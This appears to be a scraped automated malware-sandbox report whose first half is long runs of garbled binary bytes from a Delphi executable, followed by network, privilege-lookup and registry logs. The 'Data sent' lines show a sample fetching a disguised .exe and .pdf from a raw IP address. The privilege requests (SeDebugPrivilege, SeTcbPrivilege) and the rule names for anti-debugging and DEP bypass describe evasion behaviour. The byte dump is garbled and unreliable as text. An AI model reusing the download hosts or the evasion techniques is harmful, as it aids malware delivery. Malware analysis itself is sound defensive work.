P‹Mº2I‹Eü‹8ÿ—éŃ}~D‹Ç™÷}‹E+‹øMð‹×° èû÷ÿ‹Æ‹Uðè ÷ÿ€}÷„’‹E P‹M‹Uð‹Eü‹8ÿ—ë{Eì‹Óèî÷ÿ‹Uì‹ÆèÔ÷ÿ€}÷ta‹E P‹M‹Ó‹EüèiãÿÿëNEè‹ÓèÁ÷ÿ‹Uè‹Æè§÷ÿ€}÷t4‹Eøè‘÷ÿ…Àu‹E P‹M‹Ó‹Eüè0ãÿÿë‹E P‹M‹Uø‹Eü‹8ÿ—€û …þÿÿ‹èU÷ÿ‹øëO…ÿ~‹¹$2I‹×è^?ÿÿ„Àué‹Æ‹×è½÷ÿ€}÷t ‹U‹Eüè<òÿÿ3ÀZYYd‰h2IEèºèZ÷ÿÃéL÷ÿëë_^[‹å]Âÿÿÿÿ ÿÿÿÿ ‹€˜ƒx ”ÀËÀU‹ìQSV‰Mü‹ò‹Ø‹M‹Uü‹Æèš&ÿÿ…À~d‹“Ä…Òu‹UR‹È‹Ö‹Ãè!ëI‹MQjÿ‹È‹Â‹Öè Òÿÿ‹“Ä‹R ‹ƒÈ;Ð|%…À~!‹“ȋËÿ‘Ì‹ƒÄ‹@ ;ƒÈ}ß^[Y]@U‹ìƒÄäSV3ۉ]ä‹Ú‹ð3ÀUhÒ3Idÿ0d‰ ÇEøÇEüjè B÷ÿ‰Eð3ÀUhµ3Idÿ0d‰ ‹ÃèTr÷ÿ„Àu.‰]èÆEì EèPjUä¡<·]è*:÷ÿ‹M䲡pñH軺÷ÿèF÷ÿ‹Ë²¡0HèÈÿÿ‰Eô3ÀUh—3Idÿ0d‰ jj3ɋUô‹Æ‹ÿ“ ‹Eô‹ÿ‰Eø‰Uü3ÀZYYd‰hž3IEôè2×÷ÿÃé´ ÷ÿëð3ÀZYYd‰h¼3I‹EðPèPA÷ÿÃé– ÷ÿëï3ÀZYYd‰hÙ3IEäèc÷ÿÃéy ÷ÿëð‹Eø‹Uü^[‹å]Í@ƒ¸Ä•ÀÐƀ‰ÃS‹Ø‹ÃèN¸ÿÿǃ¼€ÇƒÀ€Çƒ¨@ǃ ÿÿÿÿƃˆÇƒ¸ÿÿÿÿShìI²¡týHèïÊÿÿ‰ƒ˜°è*ÿÿ‰ƒÌ¡l,HèÆÿÿ‰ƒÐ[ËÀƒÊÿ‹ÿ‘ÌÃÊÿ‹ÿ‘ÐÃU‹ìƒÄèSVW3ۉ]ô‰Mø‰Uü‹ð‹]3ÀUh»5Idÿ0d‰ ±²‹Æ‹8ÿWtƒ¾œt1EôP‹Ë‹Uø‹EüèÜ2ÿÿUô‹†œ‹ÿQ@‹Eôèf)÷ÿ‰Eì3À‰Eðë$Eô‹Uü‹ ,Hèo,÷ÿ‹Ë‹Uø‹EôèÒ#ÿÿ‰Eì‰]ðƒ}ì~y‹EìP‹Mð‹Uô‹Æ‹ÿS\‹Ø…Û}$‹Ó‹Æ‹ÿQd‰EèƆ‰‹Æ‹ÿR|‹Uè‹Æ‹ÿQh3É3Ò¡˜ IèÉÖÿÿ…ÛuƆ‰3ɲ‹Æ‹8ÿWt‹Ã™RP²‹Æ‹ÿQ8]ð)]ìƒ}ì‡3ÀZYYd‰hÂ5IEô‹,Hè†+÷ÿÃé ÷ÿëê_^[‹å]U‹ì3ÀUhý5Idÿ0d‰ ÿXÌ]u ¸¼5]èÙÔ÷ÿ3ÀZYYd‰h6IÃéN ÷ÿëø]ËÀƒ-XÌ]Ã\6Iˆ6I¸6I¢6I8(›A<@<@<@<@ <@@9@\9@,9I´ÉA¼ÉAÄ=IÌÌA¬ÍAÜÍAÔÍAP<I(8I<8I¤8Ià@à@TIdSocketHandle‹À¸6ITIdSocketHandle\6I´›AIdSocketHandle@4ÿˆ;I€BroadcastEnabled˜@ ÿ ÿ€ ClientPortMin˜@ÿÿ€ ClientPortMaxà@ÿÿ€€IP2H-ÿä?I€ IPVersion˜@ ÿ ÿ€€Port@5ÿl@I€UseNagle‹ÀSVW‹ù‹ò‹Ø‹Ã‹ÿR$€{t ²‹ÃèUŠC-PŠC,P¡8½]‹‹Ï‹Ö‹0ÿVP‹Ð‹ÃèH_^[Ë8½]‹‹@’‹ÿQËÀU‹ìQ‰Eü‹Eü€xtS‹Eü‹@0èyúÿ3ÀUh˜8Idÿ0d‰ ‹EüÆ@‹Eü‹ÿR ƒÊÿ‹Eüèí3ÀZYYd‰hŸ8I‹Eü‹@0èAúÿÃé³÷ÿëíY]ËÀU‹ìQS‰Eü‹Eüf‹@
Data received "P‹EüŠ@-P‹Eü‹H‹Eü‹P¡8½]‹‹ÿS‹Eü‹@0èòúÿ3ÀUh9Idÿ0d‰ ‹Eü€xt‹Eüè‹Eüè33ÀZYYd‰h%9I‹Eü‹@0è»úÿÃé-÷ÿëí[Y]Í@SVèU÷ÿ‹Ú‹ð‹Æ‹ÿR$F0è‚Ñ÷ÿF$èzÑ÷ÿ‹Ó€âü‹Æè“øÿ„Û~‹Æè ÷ÿ^[ÃSV‹ð‹Ê¡8½]‹‹V‹ÿSl^[ÃU‹ìSVW‹ú‹ðQ‹EP¡8½]‹‹V‹Ï‹ÿSp_^[]U‹ìSVW‹ú‹ðQ‹EP¡8½]‹‹V‹Ï‹ÿSh_^[]U‹ìSVW‹ú‹ðQ‹E P‹EP¡8½]‹‹Ï‹V‹ÿSt_^[]U‹ìƒÄäSV3҉Uä‰Uè‰Uì‹Ø3ÀUh;Idÿ0d‰ f‹s f…ö…©fƒ{ „žfƒ{„“f‹C f;Cv?·C ‰EðÆEô·C‰EøÆEüEðPjUì¡ìº]èã2÷ÿ‹M첡<%Hèt³÷ÿèÿ÷ÿëx‹Ãè^„Àum·C ‰EðÆEô·C‰EøÆEüEðPjUè¡ »]è™2÷ÿ‹M財Ð$Hè*³÷ÿèµ÷ÿë.‹Ö‹Ã貄Àu!Uä¡t¸]èi2÷ÿ‹M䲡h$Hèëþÿè…÷ÿ3ÀZYYd‰h%;IEäºè; ÷ÿÃé-÷ÿëë^[‹å]ЊP4èhÍ@U‹ìSVW‹ù‹ò‹ØC‹Öè: ÷ÿf‰{"ŠEˆC-_^[]U‹ìSVW‹ù‹ò‹ØC‹Öè ÷ÿf‰{ ŠEˆC-_^[]:P4tˆP4€xtè‘ÿÿÿÃSV‹Ú‹ðj 3ɺ‹Ãè¾ÿÿP¡8½]‹¹ÿÿ‹V‹ÿSh^[ËÀU‹ìƒÄøSV3ɉMü‹Ú‹ð3ÀUh@<Idÿ0d‰ ²‹ÆèdEúPMü¡8½]‹‹Óèûÿÿƒøÿ•Ã„Ût‹Ð‹ÆèP‹Æèõ‹Æè3ÀZYYd‰hG<IEüèõ ÷ÿÃé ÷ÿëð‹Ã^[YY]ÐSVW„ÒtƒÄðèÁ÷ÿ‹ñ‹Ú‹ø‹Î3ҋÇ踏øÿÆG5²¡ˆ0HèÈúÿ‰G0¡üÕH蟛ÿÿ‰G$²‹Çè¿fÇG fÇGÆG-…ötf‹Ff‰G ‹Ç„Ûtè¸÷ÿdƒÄ ‹Ç_^[ÃU‹ìjS‹Ø3ÀUh1=Idÿ0d‰ ‹E‹@ü€xuUü¡œº]èY0÷ÿ‹Uü¡Ì"Hè@éþÿ‹E‹@ü‹Óè3‹Ø3ÀZYYd‰h8=IEüè ÷ÿÃé÷ÿëð‹Ã[Y]ËÀU‹ìQSVW‹ò‰Eüƒþÿu¾þÿÿÿ¡˜ Iè˜Ïÿÿ„ÀtJƒþþu7U¡Ô¾]‹‹@4èWÿÿÿY‹Ø„Ûtéë7U¡Ô¾]‹ÇèAÿÿÿY‹Ø„Ûu#¡Ô¾]‹+p4¡Ô¾]‹‹x4;÷ÔU‹ÆèÿÿÿY‹Ø‹Ã_^[Y]Í@SV‹ò‹Ø‹Æ‹6Ièiýöÿ„Àt/C‹Vè¢ ÷ÿf‹F f‰C C‹Vè ÷ÿf‹F"f‰C"ŠF-ˆC-^[Ë֋Ã轊øÿ^[ËÀSP RP-RH‹8½]‹‹@’‹ÿS$[ÐSP"RP-RH‹8½]‹‹@’‹ÿS [ÐSV‹Ú‹ðƒÊÿ‹Æè„ÛtFèÀ ÷ÿfÇF Fè² ÷ÿfÇF"ÆF-^[ÐU‹ìQSVWf‰Uþ‹ð3ÀUhÙ>Idÿ0d‰ f‹EþPŠF-P‹N‹V¡8½]‹‹ÿS ³‹ÆèIÿÿÿ3ÀZYYd‰ë é¾ÿöÿ3Ûè÷ÿ‹Ã_^[Y]Í@SVWU‹ø3Ûf‹wf‹o f+îwM‹Ö‹Çèÿÿÿ„Àt³ëNfÿÅué‹Ã]_^[ÃU‹ìSVW‹ú‹ðQ‹EP¡8½]‹‹V‹Ï‹ÿSd_^[]S‹@$‹ÿQ$‹Ø„Û”Â3É¡˜ IèÐÌÿÿ‹Ã[ÃSVQ‹ò‹Ø‹Cƒøÿt ‹Ð‹C$‹ÿQ‹Æ‰Cƒøÿ•ÂˆS„ÒtD‹S‹C$‹ÿQC(P¹ºÿÿ‹Ãèmÿÿÿƒ{(u#T¹º‹ÃèUÿÿÿƒ<$”ÀˆC5ë3À‰C(Z^[ÃU‹ìj3ÉUh<@Idÿ1d‰!:P-t*€xt!Uü¡h¶]èI-÷ÿ‹Mü²¡ %Hèöåþÿèe÷ÿˆP-3ÀZYYd‰hC@IEüèù÷ÿÃé÷ÿëðY]ËÀ€xtƒx(u€òƒâR¹ºè>ùÿÿÐ:P5t ‹ÊˆH5‹ÑèËÿÿÿËÀU‹ì3ÀUh¥@Idÿ0d‰ ÿ\Ì]3ÀZYYd‰h¬@IÃé¦÷ÿëø]ËÀƒ-\Ì]ÃAIAI "H<@<@<@<@ <@@9@\9@˜9@&HEIdTransparentProxyCircularLinktAIxAI "H<@<@<@<@ <@@9@\9@˜9@&H"EIdTransparentProxyUDPNotSupportedèAILBIŒBInBIœXéH¼YB<@SB<@ <@@9@\9@DêH´ÉAÄUBÌBIœVBxDI¬VB¤WBÔYB¼VB´VBÜYBTtHTìH<ëH¬ëHìH¸/@tDI¸/@¼EIhEIFIpFIDIÄCIà@ˆà@Œà@”TIdCustomTransparentProxyŒBITIdCustomTransparentProxyèAIôéHIdCustomTransparentProxySVW‹ò‹Ø‹Æ‹œAIè`øöÿ„ÀtQƒˆ‹þ‹—ˆè‘÷ÿƒŒ‹—Œè€÷ÿf‹‡f‰ƒŠ‡’ˆƒ’ƒ”‹—”èU÷ÿë ‹Ö‹Ã蒅øÿ_^[ËÀU‹ìƒÄøSV‰Mø‰Uü‹Ø‹³˜…ötG‹Æ‹ÿR@„Àt<‹ƒ˜f‹Rj‹ˆˆ‹Uü‹Ã‹0ÿVHf‹E PŠEP‹Mø‹Uü‹ƒ˜è¡ÿÿÿëf‹E PŠEP‹Mø‹Uü‹Ã‹ÿSH^[YY]U‹ìjS3ÀUhDIdÿ0d‰ Uü¡ø·]ès)÷ÿ‹Mü²¡dóHè âþÿèýöÿ3ÀZYYd‰hDIEüè&÷ÿÃé<ýöÿëð‹Ã[Y
Data received ¾]èV3õÿë ‹U ¡ô¸]èG3õÿV¡È´]‹ÿÐY‹Ð‹EèõÿëF‹U ¡(´]è#3õÿV¡È´]‹ÿÐY‹Ð‹Eèòõÿë"‹U ¡”·]èÿ2õÿV¡È´]‹ÿÐY‹Ð‹EèÎõÿ3ÀZYYd‰h:KEàºèÐ õÿEøºèà õÿÃéµõÿëÞ^[‹å]@U‹ìƒÄôSVW3À‰Eø‹u3ÀUhþ;Kdÿ0d‰ ¡8½]‹‹ÿR@‰Eô3ÀUhá;Kdÿ0d‰ ¡X]èâøÿ3ÀUh½;Kdÿ0d‰ Eøè0 õÿ‹]‹{4‹Ç‹(,Kè)õÿ„Àt(ƒ}ŸÁUø‹Ç‹8ÿ—ƒ}øuUø‹C4‹ÿ‘ ‹{4‹Ç‹Ü.Kèíÿôÿ„Àt"ƒ}ŸÁUø‹Ç‹8ÿWhƒ}øu Uø‹C4‹ÿQd‹Æ3ɋU èGöôÿ‹M ‹Uø‹Æè~põÿ‹Eøèjõÿ‰Eü‹E ÆDÿ3ÀZYYd‰hÄ;K¡X]èøÿÃéŽõÿëî3ÀZYYd‰hè;K¡8½]‹‹Uô‹ÿQDÃéjõÿëé3ÀZYYd‰h<KEøè7 õÿÃéMõÿëð‹Eü_^[‹å]ÐU‹ì3ÉQQQQQQQSVW‹} ‹u3ÀUhÈ=Kdÿ0d‰ ¡8½]‹‹ÿR@‰Eô3ÀUh™=Kdÿ0d‰ ¡ X]èvøÿ3ÀUhu=Kdÿ0d‰ ‹Æèýäÿÿ‹ØEüPV¡È´]‹ÿÐYUèè,qõÿ‹Eè‰EìÆEð EìPU䡄¸]èµ0õÿ‹Eä3ÉZèz"ýÿ‹C‹(,Kè„þôÿ„ÀtG‹C‹Uü‹ÿ‘‹Cfƒ¸*t,EüPEøP‹M‹×‹ÆèÉúÿÿ‹EP‹EüP‹EøP‹C‹Ï‹Öè‹C‹Ü.Kè+þôÿ„ÀtD‹C‹Uü‹ÿQ`‹Cfƒ¸¢t,EüPEøP‹M‹×‹Æèsúÿÿ‹EP‹EüP‹EøP‹C‹Ï‹ÖèÇ 3ÀZYYd‰h|=K¡ X]èdøÿÃéÖõÿëî3ÀZYYd‰h =K¡8½]‹‹Uô‹ÿQDÃé²õÿëé3ÀZYYd‰hÏ=KEäºèž õÿEøºè‘ õÿÃéƒõÿëÞ_^[‹å]ËÀQˆ$3Àö$tƒÈö$tƒÈö$tƒÈZÐU‹ìƒÄàSVW‹u ‹}¡X]è»øÿ3ÀUh„?Kdÿ0d‰ ÆEï3ÀUhN?Kdÿ0d‰ ‹Æè\ãÿÿ‰Eðƒ}ðu‰}ü3ÀZYYd‰èßõÿé1V¡ô¼]‹ÿÐY‰Eøj‹Mø²¡ø1Kèë"‰Eô3ÀUh=?Kdÿ0d‰ ‹EðèÚâÿÿ‹ØV¡È¶]‹ÿÐY‰EäV¡„¹]‹ÿÐY‰Eè…ÿ~ ‹C‹@;Eè}3ÿÆEãOuÆEã‹s‹Æ‹(,Kèdüôÿ„Àt‹EèP‹EäP‹ÆŠMã‹Uô‹0ÿ–ˆEï‹s‹Æ‹Ü.Kè5üôÿ„Àt‹EèP‹EäP‹ÆŠMã‹Uô‹ÿSlˆEï3ÀZYYd‰hD?KEôèŒËõÿÃéõÿëð3ÀZYYd‰ë éIÿôÿè¬õÿ€}ït ÇEüë3À‰Eü3ÀZYYd‰h‹?K¡X]èUøÿÃéÇõÿëî‹Eü_^[‹å]Í@SQ‹Ø‹Ãèa õÿP¡˜»]‹ÿÐY
Data received ŠMüˆKŠEøˆC‹Uô‰S‹M ‰K‹Ã^[‹å]ÂSVWUƒÄ܋؋ò‰ $‹C‰D$ ‹F‹>‰D$‹S ‰T$‹C4‹k;C0s‹S0+ÐJë‹S,+ЉT$‹L$ ‹ƒú ‡ÿ$•+NSN&N¯NcN²NINyN[NÏNN|$‚ƒ|$ ‚’‹L$‰K ‰k‹T$‹Ï‰V+N‰>‰C4‹D$ ‹@PSV‹T$,‹D$,‹J3ҊP‹D$,¶@è؉$‹>‹F‰D$‹S ‰T$‹k‹C4;C0s‹S0+ÐJë‹S,+ЉT$ƒ<$t¹ƒ<$tƒÁ‹T$ ‰ é
Data received FXPN\‹†„‹@‹Öèu‹Æè¢öÿÿƆX³‹Ã]_^[ËÀ‹Ê€Áü€ér €ét€éu°Ãè$ñÍ@S‹Ú€ës3À[Ãè{ì[ÐSVW‹Ù‹úCPCPjK S‹Çf¾œÿènÎìÿ‹G`‰C_^[ÃSVW‹Ù‹ò‹CP‹CP‹K ‹S‹Æè(ý‹{…ÿt ‹×‹Æ‹ÿ‘€_^[ÐS‹Ø‹ƒ\…Àtl€¸¤t¹nS²¡LRè€íÿèÜÓìÿ‹ì‹ƒ\‹ä‹Ãè[ÿÿÿ‹ƒ\‹€À‰ƒ‹ƒ\‹€Ä‰ƒƃ첋Ãèþÿÿ[Ãÿÿÿÿ/Cannot destroy cell inplace editor at this timeS‹Ø€»ìtP‹ƒPjjjjj‹‹ƒÊÿ‹Ãè+Ìÿÿ‹ƒ\…Àt%‹ì‹ä‹ÃèÎþÿÿ‹ƒ\‹ÿR|ƃì[ËÀSV‹ð‹Ùj3ÀŠÃPh ‹†\è“óÿPèýíÿ^[ËÀU‹ìV‹UR‹„‹R‹€\‹€¸’‡Ñf¾âÿèËÌìÿ^]‹ÀU‹ìƒÄìSVWˆMÿ‹ø‹‡„‹@‹¸ÔTè2Ììÿ„À„¡Mì‹U‹E è<îÿUìM÷‹‡\èó‘òÿ‹‡„‹@f¾òÿèiÌìÿMìU÷è’òÿ‹Eì‰E÷‹Eð‰Eû²¡ÜõSèÊìÿ‹ØÆC‹E÷‰C‹Eû‰C ‹Çèw‰CŠEˆCŠEÿˆCjSh‹‡„‹@f¾òÿèÌìÿè“ÿòÿPèý íÿ_^[‹å]ÂU‹ìƒÄìSVWˆMÿ‹ø‹‡„‹@‹¸ÔTè^Ëìÿ„À„¡Mì‹U‹E è0;îÿUìM÷‹‡\è‘òÿ‹‡„‹@f¾òÿè•ËìÿMìU÷è.‘òÿ‹Eì‰E÷‹Eð‰Eû²¡ÜõSè:Éìÿ‹ØÆC‹E÷‰C‹Eû‰C ‹Çè¹v‰CŠEˆCŠEÿˆCjSh‹‡„‹@f¾òÿè0Ëìÿè¿þòÿPè) íÿ_^[‹å]ÂU‹ìQSˆMÿ‹€„‹@‹€¨fƒ¸Út#‹Ê‹Y@] S‹QDUR‹Ø‹ÐŠMÿ‹ƒÜÿ“Ø[Y]‹ÀU‹ìSV‹€„‹@‹€¨fƒ¸òt(‹ò‹^@]S‹VDURŠU R‹UR‹Ø‹Ð‹ƒôÿ“ð^[]ÂU‹ìSV‹€„‹@‹€¨fƒ¸êt ‹ò‹^@] S‹VDUR‹Ø‹Ð‹ƒìÿ“è^[]¼qSôqSìqS<P¨A¼YB<@SB<@ <@@9@\9@˜RB´ÉAÄUBÐÈA,sShUB¬VB¤WBÔYB¼VB´VBÜYBðrSTDôqSTD¼qSL©ARVTableøpR8ÿ8ÿ€€CtrS´rS¤rS8P¨A¼YB<@SB<@ <@@9@\9
Data received @¨sS´ÉAhuSÐÈAœVBhUB¬VB¤WBÔYB¼VB´VBÜYBTsS TRVTableSW´rS TRVTableSWtrSL©ARVTable|wR0ÿ0ÿ€€TSV„ÒtƒÄðè"Êìÿ‹Ú‹ð3ҋÆèAßîÿÇF0‹Æ„Ûtè[ÊìÿdƒÄ ‹Æ^[ÃS‹Ø‹Ãèfãîÿ‹Ãè[ÐÿH0ƒx0u‹@4èWÆìÿËÀU‹ìQSV„ÒtƒÄðèºÉìÿˆUÿ‹Ø3ҋÃèØÞîÿ3ɲ¡pqSènÿÿÿ‹ð‰s4‰^4‹Ã€}ÿtèáÉìÿdƒÄ ‹Ã^[Y]ÃSVèÙÉìÿ‹Ú‹ð‹F4èíÅìÿ‹Ó€âü‹ÆèÑÞîÿ„Û~‹ÆèžÉìÿ^[Í@SVWU‹ð3ۋV0€º4t=‹‚@‹’„‹z;Ç~‹Ç‹èM…í|!E3ÿ‹F0‹€„‹×èGÿÿ€xt³ë;GMuâ‹F0‹,‹ú‹ê¨0M+ï|E‹F0‹€„‹×èVGÿÿ€xt³ëGMuâ‹Ã]_^[ÐSVWUQ‰$‹Ø‹$袚îÿ‹C0‹€„‹pN…ö|-F3ÿ‹k0‹•,׋…„èGÿÿƒÀP‹D$軙îÿZˆGNu֋$èdšîÿZ]_^[ËÀSVWU‹ê‹ð‹Åèy¼îÿ‹V0€º4t?‹‚@‹’„‹J;Á~‹Á‹ØK…Û|#C3ÿ‹F0‹€„‹×è–Fÿÿ3ҊP‹Åèf»îÿGKuà‹F0‹,‹ú‹Ú˜0K+ß|!C‹F0‹€„‹×è]Fÿÿ3ҊP‹Åè-»îÿGKuà‹Åèö»îÿ]_^[ÐSVW‹ò‹Ø‹Ö‹ÃèLàîÿ‹C0Ph8zSPh0|S±ºÄuS‹Æ‹8ÿWShhtSShÈtS‹Ãè0þÿÿ‹ÈºÐuS‹Æ‹ÿS_^[ÃÿÿÿÿCÿÿÿÿ RowVAlignU‹ìƒÄ¤SVW3ۉ]¤‰]ì‰]°‰]¬‰]¨‹ù‰Uü‹Ø3ÀUhøwSdÿ0d‰ ‹Ãf¾üÿèšÅìÿƒÀ‰Eô‹Ç‹ÿR¨@t ÇEøë3À‰EøEìP‹C‰E´ÆE¸‹Eô‰E¼ÆEÀE°P‹Ç‹ÿR¨€•ÀP‹Ç‹ÿRH‹MZèbˆ‹E°‰EÄÆEÈ ŠC $%ÿ‰EÌÆEЋEø‰EÔÆE؋NjÿR ¨€•ÀM¬‹Sèf‡‹E¬‰EÜÆEà M¨‹×‹Ãf¾ýÿèìÄìÿ‹E¨‰EäÆEè U´¹¸xSèˆ?íÿ‹Uì‹Eüèõu‹U‹Eüèêu‹Uü‹Ãf¾ûÿè¬Äìÿº0xS‹EüèÏu3ɲ¡(rSè5üÿÿ‰Eð3ÒUhÎwSdÿ2d‰"ƒ} t‹E ‹$RèüÃìÿ„Àu ƃ43À‰ƒ,‹ƒ„‹@‰ƒ0ëƃ4‹E ‹P‰“,‹@ ‰ƒ0‹Eð‰X0‹Ç‹ÿR¨@t ‹Uð‹Eüèt‚ëU¤‹Eðèǀ‹U¤‹Eüè(u3ÀZYYd‰hÕwS‹EðèÛÁìÿÃé}Éìÿëð3ÀZYYd‰hÿwSE¤ºèiÐìÿEìè=ÐìÿÃéSÉìÿëã_^[‹å]Âÿÿÿÿ%d %d %s %d %d %s
Data sent GET /TopNotchSetupPacket.pdf HTTP/1.1 Host: 212.18.104.197 Connection: Keep-Alive
Data sent GET /AdeptTranslatorPro_%5B3MB%5D_%5B1sig%5D.exe HTTP/1.1 Host: 212.18.104.197
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeShutdownPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeCreateTokenPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeAssignPrimaryTokenPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeMachineAccountPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeTcbPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeSecurityPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeTakeOwnershipPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeLoadDriverPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeBackupPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeRestorePrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeShutdownPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeRemoteShutdownPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeEnableDelegationPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeManageVolumePrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeCreateGlobalPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeShutdownPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeShutdownPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeShutdownPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeShutdownPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeShutdownPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeShutdownPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeShutdownPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeShutdownPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeShutdownPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeShutdownPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeShutdownPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeShutdownPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeShutdownPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeShutdownPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeShutdownPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeShutdownPrivilege
1 1 0
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
Time & API Arguments Status Return Repeated

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
base_handle: 0x80000002
key_handle: 0x000001e4
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
base_handle: 0x80000002
key_handle: 0x000001e8
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
base_handle: 0x80000002
key_handle: 0x00000354
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
base_handle: 0x80000002
key_handle: 0x00000354
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
base_handle: 0x80000002
key_handle: 0x00000354
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
base_handle: 0x80000002
key_handle: 0x000004ac
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
base_handle: 0x80000002
key_handle: 0x00000508
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
base_handle: 0x80000002
key_handle: 0x000004fc
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
base_handle: 0x80000002
key_handle: 0x00000330
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
base_handle: 0x80000002
key_handle: 0x00000330
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
base_handle: 0x80000002
key_handle: 0x00000330
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
1 0 0

RegOpenKeyExW

